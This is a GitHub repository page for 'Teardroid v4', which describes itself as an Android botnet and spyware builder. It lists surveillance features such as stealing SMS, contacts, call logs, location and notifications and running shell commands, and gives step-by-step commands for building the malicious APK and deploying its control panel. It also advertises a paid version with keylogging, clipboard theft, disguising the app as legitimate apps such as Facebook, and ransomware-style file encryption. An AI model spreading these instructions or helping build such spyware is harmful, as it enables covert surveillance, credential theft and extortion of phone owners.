Skip to content

It's easy to use android botnet work without port forwarding, vps and android studio

License

Notifications You must be signed in to change notification settings

fxflash/Teardroid-phprat

 
 

Repository files navigation

🤖 Teardroid v4

Screenshot

🇮🇳 It's easy to use android botnet work without port forwarding, vps and android studio

GitHub issues Twitter Hacksec

🚀 Features

  • Retrieve Contact
  • Retrieve SMS
  • Retrieve running Services
  • Retrieve Device Location (:worried: Only work when the app is open on newer devices)
  • Retrieve Call Logs
  • Run Shell Command
  • Change Wallpaper
  • Send SMS
  • Make Call
  • Get Installed Apps
  • Download File
  • Read Notification
  • Auto-Start

⚠️ Requirement

  • Python3
  • Java
  • Linux or Windows os

Java version i used

$ java -version
openjdk version "11.0.13" 2021-10-19
OpenJDK Runtime Environment (build 11.0.13+8)
OpenJDK 64-Bit Server VM (build 11.0.13+8, mixed mode)

How to setup

  • Set up an account at deta.sh its free.
  • Click Deploy to Deta Button to configure your control panel.
  • Clone Teardroid-phprat repo with the following command.
$ git clone https://github.com/ScRiPt1337/Teardroid-phprat
  • cd in the Teardroid-phprat directory, then type the command below to install all dependencies
$ pip install -r requirements.txt
  • Run the following command to see the options that we can use with the builder.
$ python Teardroid.py                                                                                                         
  ______                    __           _     __         __ __
 /_  __/__  ____ __________/ /________  (_)___/ /  _   __/ // /
  / / / _ \/ __ `/ ___/ __  / ___/ __ \/ / __  /  | | / / // /_
 / / /  __/ /_/ / /  / /_/ / /  / /_/ / / /_/ /   | |/ /__  __/
/_/  \___/\__,_/_/   \__,_/_/   \____/_/\__,_/    |___/  /_/   
                                                               

usage: Teardroid.py [-h] [-v] [-b]

Teardroid v4.0 - A tool to build teardroid spyware for Android devices.

options:
  -h, --help     show this help message and exit
  -v, --version  Version of Teardroid
  -b , --build   Build Teardroid with custom name [ex: Teardroid.py -b teardroid]
  • To create an apk execute the following command.
$ python Teardroid.py -b your_app_name
  • It will prompt you with your Control Panel url enter your deta micro URL (without / at the end of the url).
  • You will also be prompted for the title and text of the notification. Enter what you want to display on the notification.
  • DONE

Deploy

🌆 Build using bot

Manually deploy the Teardroid control panel

  • Set up an account at deta.sh
  • Install Deta Cli
  • Logging in to Deta via the CLI
  • Create a new Python Micro
  • Clone Teardroidv4_api repo
  • Move all Teardroidv4_api Files to your deta micro folder.
  • Deploy the Control panel using the following command.
$ deta deploy

Dashboard

  • visit : https://{your server url}/v4/overview
  • defualt username/password is : admin/admin

Screenshot

  • Builder

  • Overview

  • TaskManager

Demo Video

🏧 Teardroid PRO

  • Go to telegram and search @teardroid_bot to know how you can get it

🌠 PRO Features

  • Get users key strokes (whatever they type in there keyboard like username password etc)
  • Get users clipboard data (get whatever is copied in there clipboard)
  • A Guide about how you can manually bind teardroid pro with any legitimate app
  • Ability to hide behind any other legitimate app without binding (like : Facebook, Twitter, LinkedIn etc)
  • Encrypt files with AES encryption (work as ransomware)
  • Robust connection with server we will setup everything for you on aws or any other self hosting server
  • 24x7 support for 3 month (any kind of help or support related to teardroid will be given by our team)

Support me

"Buy Me A Coffee"

Contact info

About

It's easy to use android botnet work without port forwarding, vps and android studio

Resources

License

Code of conduct

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Smali 99.9%
  • Other 0.1%